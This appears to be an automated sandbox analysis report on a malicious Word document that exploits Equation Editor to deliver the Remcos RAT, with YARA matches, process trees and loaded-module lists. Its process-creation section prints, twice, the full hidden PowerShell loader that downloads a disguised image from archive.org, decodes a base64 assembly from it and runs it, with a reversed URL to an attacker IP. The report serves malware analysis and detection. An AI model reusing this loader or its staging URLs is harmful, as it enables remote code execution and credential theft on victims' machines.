Source: 11.2.powershell.exe.41ceb20.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 11.2.powershell.exe.41ceb20.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
Source: 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3796, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTR | Matched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: powershell.exe PID: 3884, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: RegAsm.exe PID: 3988, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B0E0C498.doc, type: DROPPED | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\seethegeecakeisreallynicecakewhicgivingtasteoftherealgeeitscreatingniceforeverygeecakeloverswholoverthgeewhichnewonegetme__________nicecakeeateswellwithgee[1].doc, type: DROPPED | Matched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
Source: bhv71A7.tmp.13.dr | Binary or memory string: org.slneighbors
Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.expl.evad.winDOCX@16/32@8/5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 15_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 13_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 12_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$rwwstCMd.docx
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-OT0ZCG
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR7944.tmp
Source: xrrwwstCMd.docx | OLE indicator, Word Document stream: true
Source: ~WRD0000.tmp.0.dr | OLE indicator, Word Document stream: true
Source: xrrwwstCMd.docx | OLE document summary: title field not present or empty
Source: ~WRD0000.tmp.0.dr | OLE document summary: title field not present or empty
Source: ~WRF{BA66A863-2736-4CD9-8A42-3773360ED211}.tmp.0.dr | OLE document summary: title field not present or empty
Source: ~WRF{BA66A863-2736-4CD9-8A42-3773360ED211}.tmp.0.dr | OLE document summary: author field not present or empty
Source: ~WRF{BA66A863-2736-4CD9-8A42-3773360ED211}.tmp.0.dr | OLE document summary: edited time not present or 0
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ................................T.r.u.e.(.P.....................$.......j>.........................s............X...............p...............
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Console Write: ....................................u.e.(.P.....................$.......n>.........................s............X...............................
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | System information queried: HandleInformation
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: RegAsm.exe, RegAsm.exe, 0000000E.00000002.414064781.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: RegAsm.exe, 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: RegAsm.exe, RegAsm.exe, 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: xrrwwstCMd.docx | ReversingLabs: Detection: 13%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Evasive API call chain: __getmainargs,DecisionNodes,exit
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs"
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '...'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ibmyilijkzqgggcoxzdgfu"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kvsjjdtlyhiliuyshkqzizcqbm"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uxxbkweempbqtbmwyvcbtlxzcbqib"
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\fastgeecleancheckupnewthinkstobege.vbs"
                    Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[encoded payload blob removed]'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia601706.us.archive.org/2/items/new_image_20240905/new_image.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.CHMR/05/481.142.932.58//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ibmyilijkzqgggcoxzdgfu"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\kvsjjdtlyhiliuyshkqzizcqbm"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\uxxbkweempbqtbmwyvcbtlxzcbqib"
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64win.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: wow64cpu.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: msi.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: cryptsp.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rpcrtremote.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dwmapi.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: version.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: secur32.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winhttp.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: webio.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: iphlpapi.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: winnsi.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dnsapi.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: nlaapi.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc6.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: dhcpcsvc.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: rasadhlp.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: propsys.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: ntmarta.dll
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Section loaded: apphelp.dll
                    Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll
                    Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: dwmapi.dll
                    Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll
                    Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll
                    Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll
                    Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: apphelp.dll
                    Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: ntmarta.dll
                    Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64win.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wow64cpu.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rpcrtremote.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: credssp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64win.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wow64cpu.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winmm.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: samcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msacm32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwmapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: shcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rstrtmgr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: bcrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: secur32.dll
